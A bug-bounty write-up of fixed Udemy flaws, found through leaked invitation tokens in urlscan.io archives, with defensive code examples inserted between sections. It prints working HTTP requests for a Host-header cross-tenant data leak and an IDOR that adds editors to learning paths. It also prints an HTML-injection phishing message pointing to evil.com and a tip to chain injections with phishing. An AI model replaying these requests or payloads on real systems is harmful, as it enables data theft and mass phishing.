From URL dumps digging to IDOR, BAC, Massive Phishing in Udemy

Mostafa Mamdoh
4 min read · Nov 11, 2021


Hey All,

This is my first writeup since I kicked off my cyber security career, so let's start.

Recently I was trying some OSINT framework tools when I came across a website malware scanner, urlscan.io. This site scans a URL for signs of malware or phishing, and every submitted scan is archived for public access; you can search the archive by domain name or by a keyword from the URL. So I started searching for common websites like Twitter, Uber, Udemy and so on, hoping to find private instances or pages that are not normally reachable by the public. That led me to https://urlscan.io/search/#page.domain:udemy.com, where some URLs caught my attention:

*.udemy.com/?data=token
*.udemy.com/organization/accept-invitation/?email=token
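The defensive counterpart of the recon described above is to watch the same public scanner archive for your own domain, so that leaked invitation links are noticed by the owner before anyone else. The script below is an added example, not code from the post or from Udemy; it assumes the urlscan.io search API at https://urlscan.io/api/v1/search/?q=domain:<domain> returns JSON with a "results" list whose entries carry page.url and task.time, and the watched parameter names, the token shape and the sample results are constructed for illustration.

```python
# Added example (not from the post): watch public urlscan.io results for URLs
# on your own domain that carry invitation-style tokens in the query string.
# Assumptions: the urlscan.io search API returns JSON with a "results" list
# whose entries carry page.url and task.time; the watched parameter names and
# the token shape below are our own constructed choices.
import json
import re
from urllib.parse import parse_qs, urlparse
from urllib.request import Request, urlopen

# Query parameters that, on the leaked invitation URLs, carried the secret.
SENSITIVE_PARAMS = {"data", "email", "token", "invite", "code"}
# Opaque token shape: a long run of URL-safe characters, which a real e-mail
# address (containing "@" and ".") never matches.
TOKEN_RE = re.compile(r"^[A-Za-z0-9_\-]{20,}$")


def looks_like_token(value):
    return bool(TOKEN_RE.match(value))


def find_leaked_invites(results, our_domain):
    """Return the scanned URLs on our_domain (or a subdomain of it) whose
    watched query parameters hold a token-shaped value."""
    findings = []
    for entry in results:
        url = entry.get("page", {}).get("url", "")
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host != our_domain and not host.endswith("." + our_domain):
            continue
        params = parse_qs(parsed.query)
        hits = sorted(
            name for name, values in params.items()
            if name in SENSITIVE_PARAMS and any(looks_like_token(v) for v in values)
        )
        if hits:
            findings.append({
                "url": url,
                "host": host,
                "params": hits,
                "scanned_at": entry.get("task", {}).get("time"),
            })
    return findings


def fetch_results(domain, size=100):
    """Live lookup (needs network). Unauthenticated search is rate limited,
    so poll sparingly; an API key goes in urlscan's API-Key header."""
    req = Request(
        f"https://urlscan.io/api/v1/search/?q=domain:{domain}&size={size}",
        headers={"User-Agent": "invite-leak-monitor"},
    )
    with urlopen(req, timeout=30) as resp:
        return json.load(resp)["results"]


# Constructed sample in the shape described above; example.com stands in for
# the monitored domain and the token values are made up.
SAMPLE_RESULTS = [
    {"page": {"url": "https://acme.example.com/organization/accept-invitation/?email=" + "A" * 32},
     "task": {"time": "2021-02-01T10:00:00.000Z"}},
    {"page": {"url": "https://example.com/?data=" + "c7" * 20},
     "task": {"time": "2021-02-02T11:00:00.000Z"}},
    {"page": {"url": "https://example.com/courses/?page=2&sort=newest"},
     "task": {"time": "2021-02-03T12:00:00.000Z"}},
    {"page": {"url": "https://other.test/login/?token=" + "B" * 32},
     "task": {"time": "2021-02-04T13:00:00.000Z"}},
]

if __name__ == "__main__":
    for hit in find_leaked_invites(SAMPLE_RESULTS, "example.com"):
        print(hit["scanned_at"], hit["host"], hit["params"], hit["url"])
```

Run it on a schedule against `fetch_results("yourdomain")` and alert on any finding; each hit is an invitation link that should be revoked, and a steady stream of them means users are pasting links they should not have to, which is a sign the links themselves need to stop being bearer tokens.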

Broken Access Control — Udemy

The URLs were invitations to business accounts belonging to the many companies that use Udemy for Business. These invitations kept leaking onto malware scanners from time to time, because employees of those companies were submitting the invitation URLs to check them for malware.

The bug was that anyone could claim these invitations; there was no extra verification to confirm that the person redeeming an invitation was the intended user.

Invitation Redeem

They fixed it by requiring an extra verification step.
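One way to make a leaked invitation link worthless to anyone but the invitee is to bind the token to the invited address and check that binding at redemption. The code below is an added example, not Udemy's fix or any code from the post; it assumes a server-side HMAC key, a session object that carries the logged-in user's e-mail and whether that address has been verified, and an optional set of already-redeemed tokens for single-use enforcement. All names, keys and values are constructed.

```python
# Added example (not Udemy's code): an invitation token bound to the invited
# e-mail address, so a leaked link cannot be redeemed by someone else.
# Assumptions: a server-side HMAC key, a session object with the user's e-mail
# and verification status, and an optional set of redeemed tokens.
import base64
import binascii
import hashlib
import hmac
import json
import time


def _b64(raw):
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_invite(key, org, email, ttl=7 * 24 * 3600, now=None):
    """Mint an org invite for one address as payload.signature (URL-safe)."""
    issued = int(now if now is not None else time.time())
    payload = json.dumps(
        {"org": org, "email": email.strip().lower(), "exp": issued + ttl},
        separators=(",", ":"),
    ).encode()
    sig = hmac.new(key, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(sig)


def redeem_invite(key, token, session_user, now=None, redeemed=None):
    """Return (ok, detail). The checks a bare "anyone may redeem" flow lacks:
    integrity, expiry, a verified e-mail, a match with the invitee, single use."""
    try:
        p64, s64 = token.split(".")
        payload, sig = _unb64(p64), _unb64(s64)
    except (ValueError, binascii.Error):
        return False, "malformed"
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return False, "bad signature"
    data = json.loads(payload)
    current = now if now is not None else time.time()
    if current > data["exp"]:
        return False, "expired"
    if not session_user.get("email_verified"):
        return False, "verify your e-mail first"
    if session_user["email"].strip().lower() != data["email"]:
        return False, "invite was issued to a different address"
    if redeemed is not None:
        if token in redeemed:
            return False, "already redeemed"
        redeemed.add(token)
    return True, data["org"]


if __name__ == "__main__":
    key = b"constructed-demo-key"
    tok = issue_invite(key, "acme", "Alice@Example.com", now=1_000_000)
    print(redeem_invite(key, tok, {"email": "alice@example.com", "email_verified": True}, now=1_000_100))
    print(redeem_invite(key, tok, {"email": "someone@else.example", "email_verified": True}, now=1_000_100))
```

The e-mail comparison only means something if the session address is verified, which is why the flow refuses unverified accounts instead of trusting whatever address a fresh signup claims; a database-backed invite record would replace the HMAC payload, but the same four checks apply.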

Information Disclosure - Udemy

Udemy Business trial accounts did not expose all business functions or endpoints in their API, so I decided to claim one of the leaked tokens to test every available functionality, and I found the Learning Paths feature.

The Learning Paths feature lets you, as a member of a business organization (either a user or a moderator), create learning tracks and share them with others in the same organization only.

Every business organization has a handle, or account name, that looks like handle.udemy.com and distinguishes it from other organizations.

Disclosing Organizations Learning Paths

I opened Burp, intercepted the requests to *.udemy.com/learningpaths, and got:

GET /api-2.0/learning-paths/?page=1&page_size=20&fields[learning_path]=@default,is_user_enrolled,estimated_content_length,num_enrollments,folder_ids,is_owner_in_group&list_type=all&ordering=-created HTTP/1.1
Host: █████.udemy.com

HTTP/1.1 200 OK
{"count":30,"next":"█████","previous":null,"results":[{"_class":"learning_path","id":█████504,"title":"Ethical Hacking","description":"Path to becoming Ethical Hacker. Learning journey would include Web app hacking, N/W hacking, AD hacking, Privilege escalation and much more.","owner":{"_class":"user","id":█████6538,"display_name":"█████S","image_50x50":"*","initials":"SP"},"is_public":true,"editors":[{"_class":"user","id":█████6538,"display_name":"█████S","image_50x50":"█████","initials":"SP"}],"is_user_enrolled":false,"estimated_content_length":3172,"num_enrollments":2,"folder_ids":[],"is_owner_in_group":false}, ...]}

I changed the account name in the Host header to other organizations' account names and got all learning paths created in those organizations, together with their members' data.

I tested the same attack vector against other API endpoints that, according to the API documentation, do not require an account ID in the request.

Disclosing Trial Organizations Status

GET /api-2.0/organization-trial/status/ HTTP/1.1
Host: █████.udemy.com

HTTP/1.1 200 OK
{"available_count": 5, "active_remaining_days": 0, "owner_email": "█████", "trial_limit_reached": false, "used_count": 0, "owner_name": "█████", "is_owner": false, "remaining_seats": 0}

With the same attack vector as above, I changed the account name in the Host header to other organizations' names and got their trial data.

Insecure Direct Object Reference - Udemy

During my testing I noticed that a request is sent to:

PUT /api-2.0/learning-paths/█████886/permissions/ HTTP/1.1
Host: █████.udemy.com
{"added_editors_ids":[],"removed_editors_ids":[]}

I changed the learning path ID to a random one and added my user ID to added_editors_ids; the final request looked like this:

PUT /api-2.0/learning-paths/█████514/permissions/ HTTP/1.1
Host: █████.udemy.com

{"added_editors_ids":[152495920],"removed_editors_ids":[]}

HTTP/1.1 200 OK
{"results":[{"_class":"user","id":█████034,"display_name":"█████vschi","image_50x50":"█████","initials":"AP"},{"_class":"user","id":152495920,"display_name":"Mostafa Mamdoh","image_50x50":"█████","initials":"MM"}]}

I was able to add myself as an editor of any learning path, in the same organization or a different one, and I could also remove any editor by putting their ID in removed_editors_ids.
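The Host-header disclosure and the permissions IDOR are the same class of failure: the tenant comes from the request and the object comes from the URL, and neither is checked against the caller. The code below is an added example, not Udemy's code, showing both checks side by side over a constructed data model: tenant hosts look like <handle>.example.com (example.com stands in for the platform domain), and the org handles, user IDs and path IDs are made up. It also covers the cross-organization case from the IDOR, where an editor is added from a different tenant.

```python
# Added example (not Udemy's code): the authorization checks the Host-header
# bug and the learning-path IDOR were missing, over a constructed data model.
# Hosts are <handle>.example.com; handles, user ids and path ids are made up.
import copy

ORG_MEMBERS = {"acme": {1, 2}, "globex": {3}}          # org handle -> member ids
LEARNING_PATHS = {
    504: {"org": "acme", "owner": 1, "editors": {1}},
    514: {"org": "globex", "owner": 3, "editors": {3}},
}


class Forbidden(Exception):
    pass


class NotFound(Exception):
    pass


def org_from_host(host):
    """Tenant handle is the first label; anything else is not a tenant host."""
    labels = host.lower().split(".")
    if len(labels) != 3 or labels[1:] != ["example", "com"] or labels[0] == "www":
        raise NotFound("no such organization")
    return labels[0]


def require_member(org, user_id):
    """The check the vulnerable endpoints skipped: the caller must belong to
    the tenant named by the Host header, not merely be logged in somewhere."""
    if user_id not in ORG_MEMBERS.get(org, set()):
        raise Forbidden("not a member of this organization")


def list_learning_paths_vulnerable(host, user_id):
    # Tenant taken from Host alone; user_id is never consulted.
    org = org_from_host(host)
    return sorted(pid for pid, p in LEARNING_PATHS.items() if p["org"] == org)


def list_learning_paths(host, user_id):
    org = org_from_host(host)
    require_member(org, user_id)
    return sorted(pid for pid, p in LEARNING_PATHS.items() if p["org"] == org)


def update_permissions(host, user_id, path_id, added, removed, paths=None):
    """Hardened PUT .../learning-paths/<id>/permissions/. Returns the editor
    list or raises. `paths` lets callers pass a private copy of the table."""
    paths = LEARNING_PATHS if paths is None else paths
    org = org_from_host(host)
    require_member(org, user_id)
    path = paths.get(path_id)
    # Same response for "missing" and "belongs to another tenant", so ids
    # cannot be enumerated across organizations.
    if path is None or path["org"] != org:
        raise NotFound("no such learning path")
    if user_id != path["owner"] and user_id not in path["editors"]:
        raise Forbidden("only the owner or an editor may change permissions")
    members = ORG_MEMBERS[org]
    if any(uid not in members for uid in added):
        raise Forbidden("editors must be members of this organization")
    path["editors"] |= set(added)
    path["editors"] -= set(removed) - {path["owner"]}   # owner cannot be removed
    return sorted(path["editors"])


def fresh_paths():
    """Deep copy of the table so experiments do not leak between calls."""
    return copy.deepcopy(LEARNING_PATHS)


def raises(exc, fn, *args, **kwargs):
    """True if fn(*args) raises exc; handy for asserting denials."""
    try:
        fn(*args, **kwargs)
    except exc:
        return True
    return False


if __name__ == "__main__":
    print(list_learning_paths_vulnerable("globex.example.com", 1))   # cross-tenant read
    print(raises(Forbidden, list_learning_paths, "globex.example.com", 1))
    print(update_permissions("acme.example.com", 1, 504, [2], [], paths=fresh_paths()))
```

In a real service the membership lookup would hit the database, but the shape is the point: resolve the tenant, prove the caller is in it, load the object through the tenant (not by bare ID), then apply the object-level rule, and validate every ID in the request body against the same tenant.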

Possible Massive Phishing Attack Through HTML Injection

I spotted a recommendation feature designed specifically for members of the same organization. I used Burp and captured this request:

POST /api-2.0/share/course/█████/recommend/ HTTP/1.1

-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████388
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████382
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████580
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████083
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████288
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="userIds[]"
█████988
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="message"
<h1>Hey █████</h1>Please go to https://evil.com/accept to redeem your invite <img src="https://pbs.twimg.com/profile_images/810954665202434052/_m3mPbHa_400x400.jpg" alt="Smiley face" width="42" height="42" style="vertical-align:bottom">
-----------------------------374017102511920071852193229569
Content-Disposition: form-data; name="context"
ufb_clp
-----------------------------374017102511920071852193229569--

This feature lets you recommend a course to several users at once. I added many user IDs to the request, including personal (non-business) accounts I had created normally via https://www.udemy.com/join/signup-popup/, and I received this email:

In theory I could have sent injected phishing content to all of their users (nearly 150,000,000 at the time of reporting), personal and business alike, by iterating over all user IDs, because the endpoint had no rate limiting at that time.
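Three server-side controls close the gap described in this section: the message is rendered as text rather than markup, recipients are restricted to the sender's own organization (which also excludes personal accounts), and the number of recipients is capped per request and per sliding window so the endpoint cannot be driven in bulk. The code below is an added example, not Udemy's code or the post's; the user table, limits and e-mail template are constructed for illustration.

```python
# Added example (not Udemy's code): server-side controls for a "recommend to
# colleagues" endpoint: escape the message, keep recipients inside the
# sender's organization, and cap recipients per request and per window.
# The user table, limits and template are constructed.
import html
from collections import defaultdict, deque

MAX_RECIPIENTS_PER_REQUEST = 20
MAX_RECIPIENTS_PER_WINDOW = 200
WINDOW_SECONDS = 3600

# user id -> organization handle (None = personal, non-business account)
USERS_ORG = {uid: "acme" for uid in range(1, 301)}
USERS_ORG.update({400: "globex", 999: None})


class RecipientRateLimiter:
    """Sliding window over recipients sent, not requests, so splitting one
    blast into many small requests does not evade the cap."""

    def __init__(self, limit=MAX_RECIPIENTS_PER_WINDOW, window=WINDOW_SECONDS):
        self.limit, self.window = limit, window
        self.sent = defaultdict(deque)      # sender -> deque of (ts, count)

    def allow(self, sender_id, count, now):
        q = self.sent[sender_id]
        while q and q[0][0] <= now - self.window:
            q.popleft()
        if sum(c for _, c in q) + count > self.limit:
            return False
        q.append((now, count))
        return True


def render_recommendation(sender_name, message, course_url):
    """Escape every user-controlled field; only our own markup survives."""
    return (
        f"<p>{html.escape(sender_name)} recommended a course to you.</p>"
        f"<blockquote>{html.escape(message)}</blockquote>"
        f'<p><a href="{html.escape(course_url, quote=True)}">View course</a></p>'
    )


def recommend(sender_id, recipient_ids, message, course_url, now, limiter, users_org=USERS_ORG):
    """Hardened handler; returns a dict with an HTTP-style status."""
    org = users_org.get(sender_id)
    if org is None:
        return {"status": 403, "error": "only organization members can recommend"}
    recipients = set(recipient_ids) - {sender_id}
    if not recipients:
        return {"status": 400, "error": "no recipients"}
    if len(recipients) > MAX_RECIPIENTS_PER_REQUEST:
        return {"status": 400, "error": "too many recipients"}
    if any(users_org.get(r) != org for r in recipients):
        # Covers both foreign organizations and personal accounts.
        return {"status": 403, "error": "recipients must belong to your organization"}
    if not limiter.allow(sender_id, len(recipients), now):
        return {"status": 429, "error": "recipient limit reached, try later"}
    body = render_recommendation(f"user {sender_id}", message, course_url)
    return {"status": 200, "sent": len(recipients), "body": body}


if __name__ == "__main__":
    lim = RecipientRateLimiter()
    msg = '<h1>Hey</h1>Please go to https://evil.example/accept <img src="https://example.org/x.jpg">'
    print(recommend(1, [2, 3], msg, "https://example.com/course/42/", 0, lim)["body"])
    print(recommend(1, [999], "hi", "https://example.com/course/42/", 0, lim))
```

Escaping at render time is what removes the injection: the `<h1>` and `<img>` from the captured request arrive in the inbox as literal text. The organization check removes the reach (no personal accounts, no other tenants), and the limiter caps whatever is left; the constructed limits are placeholders to tune per product.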

Reports timeline:

  • March 3, 2021 - Vulnerabilities reported
  • April 7, 2021 - Total bounties awarded: $1300
  • August 7, 2021 - Reports resolved

Tips:

  • Use public URL archives or scanners to recon for private instances or leaked tokens belonging to sensitive features; see https://osintframework.com/
  • Try to elevate the impact of your content injections by chaining them with phishing scenarios


Mostafa Mamdoh

I'm a Penetration Tester and Bug Hunter @ HackerOne and @ BugCrowd